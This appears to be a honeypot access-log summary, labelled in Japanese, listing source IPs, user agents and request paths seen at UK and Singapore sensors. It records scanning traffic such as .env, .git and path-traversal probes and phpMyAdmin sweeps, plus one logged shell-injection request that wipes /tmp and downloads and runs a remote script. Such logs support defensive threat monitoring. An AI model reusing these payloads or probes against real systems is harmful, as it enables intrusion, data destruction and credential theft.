2	GET	`/c/msdownload/update/software/update/2021/11/6632de33-967441-x86.cab`	HTTP/1.1
1	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/e3e7e71a0b28b5e96cc492e636722f73/4sVKAOvu3D/BDyot0NxyG.php`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
2	GET	`/fw6I`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/hrsgdsb7386wknzms.jpg`	HTTP/1.1
2	GET	`/is-bin`	HTTP/1.1
2	GET	`/jquery-3.3.1.min.js`	HTTP/1.1
1	GET	`/jquery.js`	HTTP/1.1
1	GET	`/login`	HTTP/1.1
1	GET	`/new/login`	HTTP/1.1
1	GET	`/news.php`	HTTP/1.1
1	GET	`/qd.CHM`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
1	GET	`/ttd.exe`	HTTP/1.1
1	GET	`/viwwwsogou?op=8&query=%E7%A8%8F%E5%BB%BA%09%E9%BE%90%E1%B7%A2`	HTTP/1.1
1	GET	`/wh/glass.php`	HTTP/1.1
1	GET	`/wp-content/`	HTTP/1.1
1	GET	`/zMLUH93A`	HTTP/1.1
7	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/categories/Yud`	HTTP/1.1
2	POST	`/cgi-bin-igd/netcore_get.cgi?`	HTTP/1.1
1	POST	`/login`	HTTP/1.1
1	POST	`/nation.php`	HTTP/1.1
2	PRI	`*`	HTTP/2.0

Location:UK

送信元IPアドレス一覧

件数	送信元IPアドレス	国
45	2.49.138.218	United Arab Emirates
40	3.145.25.236	United States
1	5.188.210.227	Russia
1	34.38.127.133	United States
1	45.79.128.205	United States
1	45.79.181.179	United States
1	45.79.181.251	United States
1	47.88.94.159	United States
1	47.88.94.161	United States
10	51.79.29.48	Canada
10	54.37.79.75	France
1	64.62.197.211	United States
1	64.62.197.229	United States
1	64.62.197.240	United States
16	64.227.126.135	United States
1	66.175.213.4	United States
1	74.50.79.238	United States
2	83.97.73.87	Germany
1	84.54.51.12	Bulgaria
1	94.156.6.235	Bulgaria
3	95.214.55.115	Poland
1	103.35.142.86	India
1	103.127.78.55	India
13	104.248.191.136	United States
2	134.122.118.79	United States
1	138.68.161.141	United States
1	142.93.156.7	United States
2	146.190.110.90	United States
1	157.245.144.50	United States
1	161.35.132.151	United States
2	167.248.133.50	United States
2	172.104.11.4	United States
1	172.104.11.34	United States
1	172.105.128.11	United States
2	172.105.128.12	United States
1	172.105.128.13	United States
2	172.232.170.237	United States
1	173.195.15.69	United States
1	180.149.125.173	Mongolia
1	185.236.231.166	Portugal
1	188.166.18.104	United States
1	188.166.24.210	United States
1	192.155.90.118	United States
2	193.32.162.174	Romania
2	193.35.18.187	Bulgaria
1	193.42.33.176	Bulgaria
1	194.180.48.50	Bulgaria
1	205.210.31.141	United States
1	205.210.31.249	United States
2	209.141.54.60	United States

UserAgent一覧

件数	UserAgent
68	`-`
1	`Dark`
17	`Go-http-client/1.1`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
2	`Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0`
2	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
8	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
40	`Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36`
20	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
1	`Mozilla/5.0 (X11; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0`
1	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/109.0`
5	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
1	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
1	`Mozilla/5.0 (l9scan/2.0.4333e26363e2534313e2233313; +https[:]//leakix[.]net)`
6	`Mozilla/5.0 zgrab/0.x`
5	`Mozilla/5.0`
1	`curl/8.1.2`
1	`python-requests/2.31.0`

リクエスト内容一覧

件数	Method	Request	Protocol
1		`\x16\x03\x01\x01\x07\x01`
20		`\x16\x03\x01`
3	CONNECT	`google[.]com:443`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account2`	HTTP/1.1
1	GET	`/.DS_Store`	HTTP/1.1
24	GET	`/.env`	HTTP/1.1
1	GET	`/.git/config`	HTTP/1.1
1	GET	`/.vscode/sftp.json`	HTTP/1.1
1	GET	`/1.php`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/?rest_route=/wp/v2/users/`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
5	GET	`/Temporary_Listen_Addresses/`	HTTP/1.1
1	GET	`/_all_dbs`	HTTP/1.1
1	GET	`/_profiler/phpinfo`	HTTP/1.1
1	GET	`/about`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
1	GET	`/admin/.env`	HTTP/1.1
1	GET	`/api/.env`	HTTP/1.1
1	GET	`/app/.env`	HTTP/1.1
1	GET	`/application/.env`	HTTP/1.1
1	GET	`/apps/.env`	HTTP/1.1
1	GET	`/auth/.env`	HTTP/1.1
1	GET	`/back/.env`	HTTP/1.1
1	GET	`/backend/.env`	HTTP/1.1
1	GET	`/bundle.js`	HTTP/1.1
2	GET	`/cdn-cgi/trace`	HTTP/1.1
1	GET	`/cli/.env`	HTTP/1.1
1	GET	`/config.json`	HTTP/1.1
1	GET	`/config/.env`	HTTP/1.1
1	GET	`/core/.env`	HTTP/1.1
1	GET	`/cp/.env`	HTTP/1.1
1	GET	`/debug/default/view?panel=config`	HTTP/1.1
1	GET	`/dependencies/.env`	HTTP/1.1
1	GET	`/deployment/.env`	HTTP/1.1
1	GET	`/dev/.env`	HTTP/1.1
1	GET	`/development/.env`	HTTP/1.1
1	GET	`/docker/.env`	HTTP/1.1
1	GET	`/document/.env`	HTTP/1.1
1	GET	`/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application`	HTTP/1.1
1	GET	`/engine/.env`	HTTP/1.1
4	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/files/`	HTTP/1.1
1	GET	`/form.html`	HTTP/1.1
1	GET	`/framework/.env`	HTTP/1.1
1	GET	`/frontend/.env`	HTTP/1.1
1	GET	`/geoip/`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/info.php`	HTTP/1.1
1	GET	`/laravel-artisa/.env`	HTTP/1.1
1	GET	`/laravel/.env`	HTTP/1.1
1	GET	`/local/.env`	HTTP/1.1
1	GET	`/login.action`	HTTP/1.1
1	GET	`/login/.env`	HTTP/1.1
1	GET	`/master/.env`	HTTP/1.1
1	GET	`/password.php`	HTTP/1.1
1	GET	`/personal/.env`	HTTP/1.1
1	GET	`/private/.env`	HTTP/1.1
1	GET	`/project/.env`	HTTP/1.1
1	GET	`/protected/.env`	HTTP/1.1
1	GET	`/rest/.env`	HTTP/1.1
1	GET	`/s/4333e26363e2534313e2233313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
1	GET	`/search/.env`	HTTP/1.1
1	GET	`/server-status`	HTTP/1.1
1	GET	`/server/.env`	HTTP/1.1
1	GET	`/shared/.env`	HTTP/1.1
1	GET	`/site/.env`	HTTP/1.1
1	GET	`/src/.env`	HTTP/1.1
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/system/.env`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.1
1	GET	`/telescope/requests`	HTTP/1.1
1	GET	`/upl.php`	HTTP/1.1
1	GET	`/v2/_catalog`	HTTP/1.1
2	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
1	GET	`/vod_installer/.env`	HTTP/1.1
1	GET	`/vue/.env`	HTTP/1.1
1	GET	`/web/.env`	HTTP/1.1
1	GET	`/wp-content/`	HTTP/1.1
1	GET	`http[:]//132[.]145[.]66[.]34:80/MyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/PHPMYADMIN/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/SQL/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/_phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/phpmyadmin/scripts/setup.txt`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/db/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/dbadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqladmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/mysqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php-myadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/php/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.10.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.0/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.1.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.7/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.11.9.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.4/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.5/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.5.7-pl1/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2.8.0.2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin-2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin2/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpMyAdmin3/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmy-admin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/phpmyadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/pma/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlmanager/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/sqlweb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/web/phpMyAdmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webadmin/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/webdb/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//132[.]145[.]66[.]34:80/websql/scripts/setup.php`	HTTP/1.0
1	GET	`http[:]//5[.]188[.]210[.]227/echo.php`	HTTP/1.1
5	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/cgi-bin-igd/netcore_get.cgi?`	HTTP/1.1
1	POST	`/cgi/networkDiag.cgi`	HTTP/1.1
1	POST	`/login`	HTTP/1.1
1	PRI	`*`	HTTP/2.0

Location:SG

送信元IPアドレス一覧

件数	送信元IPアドレス	国
1	14.225.245.150	Vietnam
1	35.187.114.141	United States
1	36.99.136.128	China
1	38.68.52.142	United States
2	45.33.80.243	United States
1	45.56.108.128	United States
1	45.79.181.179	United States
1	45.88.90.111	Bulgaria
1	45.88.90.116	Bulgaria
1	47.251.11.3	United States
1	47.251.14.232	United States
15	51.79.29.48	Canada
4	54.36.115.221	France
1	65.49.1.77	United States
2	65.49.20.67	United States
2	66.175.213.4	United States
2	74.50.79.238	United States
2	83.97.73.87	Germany
1	87.251.64.153	Russia
2	91.240.118.29	Russia
3	95.214.55.115	Poland
2	109.237.97.180	Russia
4	109.237.98.226	Russia
2	134.122.118.79	United States
1	142.93.156.7	United States
1	147.78.47.10	Lebanon
2	162.142.125.215	United States
2	167.94.138.35	United States
2	167.94.146.51	United States
1	172.104.11.46	United States
3	172.104.11.51	United States
1	172.105.128.11	United States
1	180.149.125.163	Mongolia
1	188.166.18.104	United States
1	188.166.24.210	United States
1	192.155.90.118	United States
1	192.155.90.220	United States
2	193.32.162.174	Romania
2	193.35.18.187	Bulgaria
1	193.42.33.176	Bulgaria
2	194.180.48.50	Bulgaria
1	198.235.24.29	United States
1	198.235.24.150	United States
1	209.141.54.60	United States

UserAgent一覧

件数	UserAgent
27	`-`
2	`Go-http-client/1.1`
2	`Mozilla/5.0 (Linux; Android 10; LIO-AN00 Build/HUAWEILIO-AN00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Mobile Safari/537.36`
1	`Mozilla/5.0 (Linux; Android 9; VTR-L09) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36 Edg/110.0.1587.50`
2	`Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36`
1	`Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36`
23	`Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36`
9	`Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0`
3	`Mozilla/5.0 (compatible; CensysInspect/1.1; +https[:]//about[.]censys[.]io/)`
5	`Mozilla/5.0 zgrab/0.x`
1	`Mozilla/5.0`

リクエスト内容一覧

件数	Method	Request	Protocol
2		`-`
1		`\x03`
3		`\x16\x03\x01\x01H\x01`
17		`\x16\x03\x01`
2	CONNECT	`google[.]com:443`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account1`	HTTP/1.1
1	GET	`/../../mnt/mtd/Config/Account2`	HTTP/1.1
23	GET	`/.env`	HTTP/1.1
1	GET	`/?XDEBUG_SESSION_START=phpstorm`	HTTP/1.1
1	GET	`/Public/home/js/check.js`	HTTP/1.1
4	GET	`/Temporary_Listen_Addresses/`	HTTP/1.1
1	GET	`/actuator/gateway/routes`	HTTP/1.1
5	GET	`/favicon.ico`	HTTP/1.1
1	GET	`/geoserver/web/`	HTTP/1.1
1	GET	`/script`	HTTP/1.1
1	GET	`/shell?cd+/tmp;rm+-rf+*;wget+ 95.214.24.125/jaws;sh+/tmp/jaws`
1	GET	`/stalker_portal/server/tools/auth_simple.php`	HTTP/1.1
1	GET	`/static/admin/javascript/hetong.js`	HTTP/1.1
1	GET	`/systembc/password.php`	HTTP/1.0
1	GET	`/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php`	HTTP/1.1
9	POST	`/boaform/admin/formLogin`	HTTP/1.1
1	POST	`/login`	HTTP/1.1
3	PRI	`*`	HTTP/2.0